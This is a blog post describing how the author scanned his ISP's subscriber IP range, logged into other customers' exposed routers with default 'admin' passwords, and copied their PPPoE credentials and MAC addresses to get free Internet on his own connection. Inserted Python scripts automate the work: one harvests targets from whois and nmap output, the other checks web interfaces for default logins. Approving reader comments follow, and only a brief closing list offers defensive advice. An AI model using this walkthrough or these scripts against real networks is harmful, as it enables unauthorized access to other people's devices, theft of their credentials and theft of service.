This post is about how I could hack other subscribers of my ISP to get free Internet, so if you are not interested you can get back to your work :)
*Let's start*
For the last few days I have been participating in bug bounty programs, but I got bored and tired of testing web applications, so I decided to leave bug hunting for a while and started playing with my router's configuration. There I saw an option named "Remote Web Management". It allows users to access and manage their router from the Internet.
I wondered why we even need this feature.
And what use is it, since IP addresses are assigned dynamically (unless you are rich enough to get a static IP address)?
So I thought there could be some routers which have this option enabled by default, and there is also a chance that someone would enable it unknowingly or knowingly (static IP address people, remember?).
And, fortunately for me, some thug people don't even bother to change the default password of the router web interface, and some routers don't even provide an option to change the password of the web interface. #ultra_thug_life
So I decided to look for such routers in my ISP's network.
I have a DSL broadband Internet connection, so each user is given a username and password to connect to the Internet via PPPoE.
And the server (the ISP's PPPoE access concentrator) only checks the MAC address, username and password before establishing the session. In other words, if you can get a user's MAC, username and password, you can log in to their PPPoE account and connect to the Internet.
So the first thing I did was go to my router's status page and check the Internet connection information.
OK! Here the WAN IP address is 172.x.x.10, which is a public IP address (in the old class B range).
So we can conclude that after successful PPPoE authentication, the ISP assigns my router the WAN IP address 172.x.x.10.
In short, my router gets a public IP address 172.x.x.10 that is reachable from the Internet, which means anyone could access my router's web interface over the Internet at 172.x.x.10 if I enabled the remote web management feature.
The next thing I had to do was find out the IP address block owned by my ISP.
Our old friend "whois" agreed to help me with it.
According to "whois", my ISP owns the IP address block 172.x.x.0-172.x.x.255 (a /24).
Next I needed to find all IP addresses in this range with port 80 or 8080 open.
This time our old friend "nmap" agreed to help me with it.
Note: I only scanned a small part of the ISP's range to get results faster; you can scan the whole range owned by the ISP to get more results.
Here I got 3 IP addresses with port 80 or 8080 open.
So I opened all of them in the browser:
http://172.x.x.84:8080
http://172.x.x.129
http://172.x.x.228
One of them was a surveillance camera, one showed just a blank HTML page, and one was a router: http://172.x.x.84:8080
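As an added example (not code from the original post), here is how I would make the whois and nmap steps above repeatable: a small Python script that pulls the inetnum range out of whois output, converts it to CIDR blocks you can hand to nmap, and then parses nmap's grepable output to list every host with port 80 or 8080 open as a URL to paste into the browser. The whois and nmap outputs embedded below are constructed samples, the RFC 5737 documentation range 192.0.2.0/24 stands in for the masked 172.x.x.0/24, and all function and variable names are mine.

```python
import ipaddress
import re

# Constructed sample of `whois <WAN IP>` output; 192.0.2.0/24 stands in for
# the ISP's real (masked) 172.x.x.0/24 block.
SAMPLE_WHOIS = """\
inetnum:        192.0.2.0 - 192.0.2.255
netname:        EXAMPLE-DSL-POOL
descr:          Example ISP DSL subscriber pool
country:        XX
status:         ASSIGNED PA
"""

# Constructed sample of `nmap -p 80,8080 -oG - 192.0.2.0/24` output. Closed and
# filtered entries are kept on purpose so the parser has to check the state.
SAMPLE_NMAP_GREPABLE = """\
# Nmap 7.94 scan initiated as: nmap -p 80,8080 -oG - 192.0.2.0/24
Host: 192.0.2.84 ()\tStatus: Up
Host: 192.0.2.84 ()\tPorts: 80/closed/tcp//http///, 8080/open/tcp//http-proxy///
Host: 192.0.2.129 ()\tStatus: Up
Host: 192.0.2.129 ()\tPorts: 80/open/tcp//http///, 8080/filtered/tcp//http-proxy///
Host: 192.0.2.228 ()\tStatus: Up
Host: 192.0.2.228 ()\tPorts: 80/open/tcp//http///, 8080/open/tcp//http-proxy///
# Nmap done at ... -- 256 IP addresses (3 hosts up) scanned
"""


def whois_to_networks(text):
    """Extract the inetnum range and return the CIDR blocks that cover it."""
    m = re.search(r"^inetnum:\s*(\S+)\s*-\s*(\S+)", text, re.M)
    if not m:
        raise ValueError("no inetnum line in whois output")
    first, last = (ipaddress.ip_address(x) for x in m.groups())
    return [str(n) for n in ipaddress.summarize_address_range(first, last)]


def nmap_open_web_ports(text, ports=(80, 8080)):
    """Parse nmap grepable (-oG) output; return {host: [open wanted ports]}."""
    result = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        open_ports = []
        for entry in ports_field.split(","):
            # Each entry looks like: port/state/proto/owner/service/rpc/version/
            fields = entry.strip().split("/")
            if len(fields) < 3:
                continue
            port, state = int(fields[0]), fields[1]
            if state == "open" and port in ports:
                open_ports.append(port)
        if open_ports:
            result[host] = open_ports
    return result


def candidate_urls(hosts):
    """Build one browser URL per open port, omitting :80 on the default port."""
    urls = []
    for host, ports in hosts.items():
        for port in ports:
            urls.append(f"http://{host}" if port == 80 else f"http://{host}:{port}")
    return urls


if __name__ == "__main__":
    print("scan targets:", whois_to_networks(SAMPLE_WHOIS))
    for url in candidate_urls(nmap_open_web_ports(SAMPLE_NMAP_GREPABLE)):
        print(url)
```

For the real thing, feed `whois <your WAN IP>` into `whois_to_networks` and `nmap -p 80,8080 -oG - <cidr>` into `nmap_open_web_ports`; adding `--open` to nmap would simply drop the closed and filtered entries that the sample keeps. Only run this against a range you are authorized to scan.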
It was a Linksys router. I tried my luck with the very-hard-to-guess password "admin" and, you guessed it, I was in.
Always remember: "admin":"admin" and "admin":<blank password> are the first things to try in such situations; they work far more often than they should.
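Added example, again not from the original post: a checker for the "admin":"admin" and "admin":blank pairs over HTTP Basic auth, which is what the older Linksys web interfaces use. The `fetch` parameter and the function names are my own choices; `fetch` lets the logic run offline against a fake responder, while `http_status` is the real HTTP path using only the standard library. A router that serves a form-based login page (no 401 challenge) is reported as "nothing to test" rather than as a false positive.

```python
import base64
import urllib.error
import urllib.request

# The pairs the post says to try first; extend with vendor defaults as needed.
DEFAULT_CREDS = [("admin", "admin"), ("admin", "")]


def basic_auth_header(user, password):
    """Build the value of an HTTP Basic Authorization header."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def http_status(url, headers, timeout=5):
    """Send one GET and return the HTTP status code, including 4xx/5xx."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def find_default_login(url, creds=DEFAULT_CREDS, fetch=http_status):
    """Return the first (user, password) pair the interface accepts, else None.

    `fetch(url, headers)` must return an HTTP status code; the default is the
    real request above, a fake can be injected for offline use.
    """
    # No 401 challenge means no Basic auth in play (form login, or a page that
    # does not need credentials at all): nothing for this checker to test.
    if fetch(url, {}) != 401:
        return None
    for user, password in creds:
        status = fetch(url, {"Authorization": basic_auth_header(user, password)})
        if status == 200:
            return (user, password)
    return None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.84:8080/"
    print(target, "->", find_default_login(target))
```

Keep the credential list short: the point is to confirm that a default is still in place, and some firmware locks the interface for a while after a handful of failed logins, so a long list mostly tests the lockout.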
Now what?
Obviously I went to the status page of that router and copied the MAC address and the PPPoE credentials (username and password).
Then I simply put that information into my own router and got a connection to the Internet ;)
I ran a speed test to check the speed:
Note: if a user is already connected to the Internet, you can't use their credentials to connect at the same time; the ISP does not allow two simultaneous sessions on a single account.
Conclusion:
- Think before you enable the "Remote Web Management" feature on your router
- Always change the default password of your router
- Never assign the same password to all users (for ISPs)
Thanks
Very good read. 👍
Yaaa, did this same before.... nice one, blog.
Thanks bro! :D